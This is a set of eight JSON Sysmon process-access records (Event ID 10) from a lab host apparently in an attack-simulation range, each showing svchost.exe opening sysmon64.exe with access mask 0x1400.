{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9282,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9283,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9284,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9285,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9286,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9287,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9288,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:03:46","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":9289,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:03:46.701\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:03:46.701","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:03:47","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
